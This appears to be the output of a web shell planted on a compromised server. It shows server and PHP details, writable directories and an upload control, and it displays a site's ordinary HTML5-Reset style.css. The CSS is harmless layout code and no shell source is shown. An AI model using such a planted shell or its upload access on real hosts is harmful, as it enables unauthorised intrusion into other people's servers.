KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.4.62
System : FreeBSD fbsdweb2.web.rcn.net 14.1-RELEASE FreeBSD 14.1-RELEASE releng/14.1-n267679-10e31f0946d8 GENERIC amd64
User : www ( 80)
PHP Version : 8.3.8
Disable Function : NONE
Directory :  /domains/kfoley/_/css/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /domains/kfoley/_/css/style.css
/*
	HTML5 Reset :: style.css
	----------------------------------------------------------
	We have learned much from/been inspired by/taken code where offered from:
	
	Eric Meyer					:: http://ericmeyer.com
	HTML5 Doctor				:: http://html5doctor.com
	and the HTML5 Boilerplate	:: http://html5boilerplate.com
	
-------------------------------------------------------------------------------*/

/* Let's default this puppy out
-------------------------------------------------------------------------------*/

html, body, body div, span, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, abbr, address, cite, code, del, dfn, em, img, ins, kbd, q, samp, small, strong, sub, sup, var, b, i, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td, article, aside, figure, footer, header, hgroup, menu, nav, section, time, mark, audio, video {
	margin: 0;
	padding: 0;
	border: 0;
	outline: 0;
	font-size: 100%;
	vertical-align: baseline;
	background: transparent;
}									

article, aside, figure, footer, header, hgroup, nav, section {display: block;}

/* Responsive images and other embedded objects
   Note: keeping IMG here will cause problems if you're using foreground images as sprites.
   If this default setting for images is causing issues, you might want to replace it with a .responsive class instead. */
img,
object,
embed {max-width: 100%;}

/* force a vertical scrollbar to prevent a jumpy page */
html {overflow-y: scroll;}

/* we use a lot of ULs that aren't bulleted. 
	don't forget to restore the bullets within content. */
ul {list-style: none;}

blockquote, q {quotes: none;}

blockquote:before, 
blockquote:after, 
q:before, 
q:after {content: ''; content: none;}

a {margin: 0; padding: 0; font-size: 100%; vertical-align: baseline; background: transparent;}

del {text-decoration: line-through;}

abbr[title], dfn[title] {border-bottom: 1px dotted #000; cursor: help;}

/* tables still need cellspacing="0" in the markup */
table {border-collapse: collapse; border-spacing: 0;}
th {font-weight: bold; vertical-align: bottom;}
td {font-weight: normal; vertical-align: top;}

hr {display: block; height: 1px; border: 0; border-top: 1px solid #ccc; margin: 1em 0; padding: 0;}

input, select {vertical-align: middle;}

pre {
	white-space: pre; /* CSS2 */
	white-space: pre-wrap; /* CSS 2.1 */
	white-space: pre-line; /* CSS 3 (and 2.1 as well, actually) */
	word-wrap: break-word; /* IE */
}

input[type="radio"] {vertical-align: text-bottom;}
input[type="checkbox"] {vertical-align: bottom; *vertical-align: baseline;}
.ie6 input {vertical-align: text-bottom;}

select, input, textarea {font: 99% sans-serif;}

table {font-size: inherit; font: 100%;}
 
/* Accessible focus treatment
	people.opera.com/patrickl/experiments/keyboard/test */
a:hover, a:active {outline: none;}

small {font-size: 85%;}

strong, th {font-weight: bold;}

td, td img {vertical-align: top;} 

/* Make sure sup and sub don't screw with your line-heights
	gist.github.com/413930 */
sub, sup {font-size: 75%; line-height: 0; position: relative;}
sup {top: -0.5em;}
sub {bottom: -0.25em;}

/* standardize any monospaced elements */
pre, code, kbd, samp {font-family: monospace, sans-serif;}

/* hand cursor on clickable elements */
.clickable,
label, 
input[type=button], 
input[type=submit], 
button {cursor: pointer;}

/* Webkit browsers add a 2px margin outside the chrome of form elements */
button, input, select, textarea {margin: 0;}

/* make buttons play nice in IE */
button {width: auto; overflow: visible;}
 
/* scale images in IE7 more attractively */
.ie7 img {-ms-interpolation-mode: bicubic;}

/* prevent BG image flicker upon hover */
.ie6 html {filter: expression(document.execCommand("BackgroundImageCache", false, true));}

/* let's clear some floats */
.clearfix:before, .clearfix:after { content: "\0020"; display: block; height: 0; overflow: hidden; }  
.clearfix:after { clear: both; }  
.clearfix { zoom: 1; }  

:focus {/* remember to define focus styles! */
	outline: 0;
}

/* Ok, this is where the fun starts.
-------------------------------------------------------------------------------*/

/* new Linux- and Windows-friendly sans-serif font stack: http://mky.be/fontstack */
body {font: 12px 'Arial', Helvetica, Helmet, Freesans, sans-serif;}

/* using local fonts? make sure to read up on Paul Irish's 
	Bulletproof @font-face syntax: http://mky.be/font-face/bulletproof/ */

/* we like off-black for text */
body, select, input, textarea {color: #333;}

a {color: #4E7335;}
a:hover, a:focus {color: #549C24;}

/* Custom text-selection colors (remove any text shadows: twitter.com/miketaylr/status/12228805301) */
::-moz-selection{background: #fcd700; color: #fff; text-shadow: none;}
::selection {background: #fcd700; color: #fff; text-shadow: none;} 

/*	j.mp/webkit-tap-highlight-color */
a:link {-webkit-tap-highlight-color: #fcd700;} 

ins {background-color: #fcd700; color: #000; text-decoration: none;}
mark {background-color: #fcd700; color: #000; font-style: italic; font-weight: bold;}


/* Main site styles!
-------------------------------------------------------------------------------*/
body {
	background:#D8D8D8;
}

.wrapper {
	width:960px;
	margin:0 auto;
}
.container {
	width:800px;
	margin:20px auto;

}

.container p {
	padding:10px 0px 4px 0px;
        line-height:16px;
}
.container h1,.container h2 {
	padding:20px 0px 4px 0px;
}
.container h1{
	font-size:14px;
}
.container h2{
	font-size:12px;
}
.container h3{
	padding-top:30px;
	font-size:26px;
	color:#FFF;
	font-weight:normal;
text-shadow: 1px 1px 1px rgba(0,0,0,.5);
}

#site-title {
	float: left;
	font-size: 30px;
	line-height: 36px;
	margin: 0;
	padding: 0px 0 0px 0px;
	width: 340px;
	height:80px;
	position:relative;
	display:block;
	overflow:hidden;
}
#site-title a {
	color: #000;
	font-weight: bold;
	text-decoration: none;
	margin: 0px 0 0px 0px;
	background: url(img/medicompts-logo.png) top left no-repeat;
	width: 335px;
	height:77px;
  	position:absolute;
	text-indent: -10000px;
	overflow:hidden;
}
.header {

	width:100%;
	height:90px;

}
.content {
	background:#FF9900 url(img/watermark-logo.png) center center no-repeat;
	width:100%;
	height:357px;	
overflow: hidden;
}

.pane {
  display: none;
	z-index:3;

}
.pane.visible {
  display: block;
}


.post{
margin:40px 20px 20px 30px;
width:322px;
}


.sidebardata{
margin:50px 20px 20px 30px;
}

.main {
	float: left;
	margin: 0 -432px 0 0px;
overflow: hidden;

}

.sidebar {
float:right;
width:416px;
clear: right;
overflow: hidden;
border-left:1px solid #FFAD33;
background:none;
-ms-filter:progid:DXImageTransform.Microsoft.gradient(startColorstr=#19FFFFFF,endColorstr=#19FFFFFF);
filter:progid:DXImageTransform.Microsoft.gradient(startColorstr=#19FFFFFF,endColorstr=#19FFFFFF);
zoom: 1;
background:rgba(255,255,255,.1);
	height:357px;
position:relative;
}

.slidetext{
width:384px;/*Original 384px*/
height:220px;
float:left;
margin:110px 20px 0 60px;
text-shadow: 1px 1px 1px rgba(0,0,0,.5);
}

.slidepic {
float:left;
width:416px;
height:357px;
margin:0px 0px 0 -80px;
    background-color:#BB7000;
    background-image:url(img/loader.gif);
    background-repeat:no-repeat;
    background-attachment:fixed;
    background-position:center center;
}



#slider{
width:800px;
height:357px;
overflow:hidden;
}
#slider .sidebar1 {
margin:-68px 0 0 0;
}

#slider .slidepic img {
width:416px;
	height:357px;

}

#slider h2{
	padding-top:30px;
	font-size:26px;
	color:#000;
	font-weight:normal;
width:290px;
text-align:right;
line-height:36px;
}
#slider h2 span.highlight{
	color:#FFF;
	font-size:32px;
}

.founder{
border:5px solid #f1f1f1;
margin:15px;
	-webkit-box-shadow: -2px 2px 2px rgba(0,0,0,.5);
	-moz-box-shadow: -2px 2px 2px rgba(0,0,0,.5);
	box-shadow: -2px 2px 2px rgba(0,0,0,.5);
}

.quote {
color:#000;
font-weight:normal;
padding:2px;
font-size:14px;
}

.address{
font-size:15px;
}
.left-text-contact{
color:#F2f2f2;
font-weight:bold;
font-size:16px;
float:left;
width:100px;
line-height:22px;

}
.right-text-contact{
font-weight:bold;
margin-right:110px;
font-size:12px;
float:right;
width:100px;
line-height:22px;
}
.right-text-contact a{
text-decoration:none;
}
.right-text-contact a:hover, .right-text-contact a:focus{
text-decoration:none;
color:#FFF;
}

.maplink{
z-index:15;
position:absolute;
padding:3px 5px;
margin:8px;
right:0;
bottom:0;
color:#FFF;
text-decoration:none;
	background:#FF9900;
}
.maplink:hover, .maplink:focus{
color:#000;
}
.googlemap{
z-index:1;
position:relative;
}

.mapcover{
position:absolute;
  -ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";
  /* IE 5-7 */
  filter: alpha(opacity=30);
  /* Netscape */
  -moz-opacity: 0.3;
  /* Safari 1.x */
  -khtml-opacity: 0.3;
   opacity: 0.3;
background:#2B431C;
width:415px;
height:357px;
z-index:10;
overflow: hidden;
border-left:1px solid rgba(255,255,255,.2);
}

.topnavbox {
background:none;
-ms-filter:progid:DXImageTransform.Microsoft.gradient(startColorstr=#7FFF9900,endColorstr=#7FFF9900);
filter:progid:DXImageTransform.Microsoft.gradient(startColorstr=#7FFF9900,endColorstr=#7FFF9900);
zoom: 1;
	background:rgba(255,153,0,.5);
	display: block;
	float: none;
	width:800px;
	position:absolute;
	height:36px;
	z-index:900;
	border-bottom: 1px solid #D98200;
}

.topnav {
width:384px;
}


ul.topnav  {
	list-style: none;
	margin: 0;
	text-align:right;
	float: left;

}
.topnav li {
	float: left;
	position: relative;
	height:36px;
	width:95px;
	text-align:center;
	font-size: 11px;
	border-right:1px solid #D98200;
}

.topnav a {
	color: #2B2B2B;
	display: block;
	line-height: 14px;
	padding: 4px 0px 0px;
	text-decoration: none;
	text-transform:capitalize;/*uppercase*/
	text-shadow:#FFB74B 0px 1px 0;
	font-weight: normal;
	font-size: 11px;
	-webkit-transition: background-color,color .3s ease-in-out;
	-moz-transition: background-color,color .3s ease-in-out;
	-o-transition: background-color,color .3s ease-in-out;
	transition: background-color,color .3s ease-in-out;
}

.topnav li:hover > a,
.topnav a:focus,
.topnav li a.selected {
	color: #FFFFFF;
	text-shadow:#385524 0px 1px 0;
	background:#4E7335;
	line-height: 14px;
	height: 32px;
}

ul.squarelist
{
list-style-type: none;
padding: 10px 0px 0px 0px;
margin: 0px;
}
ul.squarelist li
{
background-image: url(img/square-bullet.png);
background-repeat: no-repeat;
background-position: 0 7px;
padding: 0px 0 0 15px;
line-height: 20px;
}

.footernav {
	width:100%;
	height:42px;
	z-index:800;
}
.footerbuttons {
	margin:10px 0 0 0;
	width:400px;
}
.contact-button{
	float:right;
	margin-top:55px;
	text-shadow:#FFF 0px 1px 0;
}
.contact-button a{
	text-decoration:none;
}
.contact-button a.selected{
	text-decoration:underline;
}

.contact-button > a span{
	background: transparent url(img/contact-arrow.png) no-repeat center center;
	width: 6px;
	height: 7px;
	position: absolute;
	margin:4px 0 0 -10px;
}
.contact-button > a.selected span{
	-webkit-transform:rotate(90deg);
	-moz-transform:rotate(90deg);
        transform:rotate(90deg);
	text-decoration:none;
}

.greenbutton a, .greenbutton a:hover, .greenbutton a:focus {
	display:inline-block;
	padding: 2px 15px;
	margin: 0 3px 0 0;
	background-color: #4E7335;
	color:#ffffff !important;
	border:none;
	cursor:pointer;
	text-align:center;
	font-size:11px;
	font-style:normal;
  	font-weight:normal;
	text-decoration:none;
	text-transform: uppercase;
	width:auto;
	border:1px solid #4E7335;
	-webkit-transition: background-color,color .3s ease-in-out;
	-moz-transition: background-color,color .3s ease-in-out;
	-o-transition: background-color,color .3s ease-in-out;
	transition: background-color,color .3s ease-in-out;
}

.greenbutton:hover a, .greenbutton:focus a, .greenbutton a.selected {
	background-color: #FF9900;
	color:#383534 !important;
	border:1px solid #FFFFFF;
	text-decoration:none!important;
}
.footeremail {
	margin:14px 0 0 0;
	color:#434343;
	font-size:12px;
}
.footeremail a {
	text-decoration:none;
}
.alignleft {
float:left;
}
.alignright {
float:right;
}
.copyright {
	width:100%;
	background:#BEBEBE;
	height:20px;
	text-align:center;
	font-size:10px;
	line-height:20px;
	color:#4B4B4B;
}



/* Print styles!
-------------------------------------------------------------------------------*/
@media print {

body {
	background:#FFF;
	color:#000!important;
}

a {color: #0000FF;}

.wrapper {
	width:100%;
	margin:0 auto;
}
.container {
	width:100%;
	margin:20px auto;

}
.content {
	background:#FFF;
}

.sidebar {
	border-left:1px solid #000;
}

.footernav {
	border-top:1px solid #000;
}

.topnav li {
	width:24.5%;
	border-right: 1px solid #000;
}
.topnav li:last-child {
	border-right: none;
}

.topnav a {
	text-shadow:none;
}
.topnavbox {
	border-bottom: 1px solid #000;
	border-top: 1px solid #000;
}

	#site-title {
		float: left;
		line-height: 1.4em;
		margin: 0;
		padding: 0;
	}
	#site-title {
		font-size: 31pt;
	}
	#site-title a {
		background:none !important;
		text-indent: 0px !important;
		float: left;
	}

}


/* Media queries!
-------------------------------------------------------------------------------*/

/* Consider this: www.cloudfour.com/css-media-query-for-mobile-is-fools-gold/ */
@media screen and (max-device-width: 480px) {
	
		
}

@media all and (orientation: portrait) {
	
}

@media all and (orientation: landscape) {
	
}


Anon7 - 2021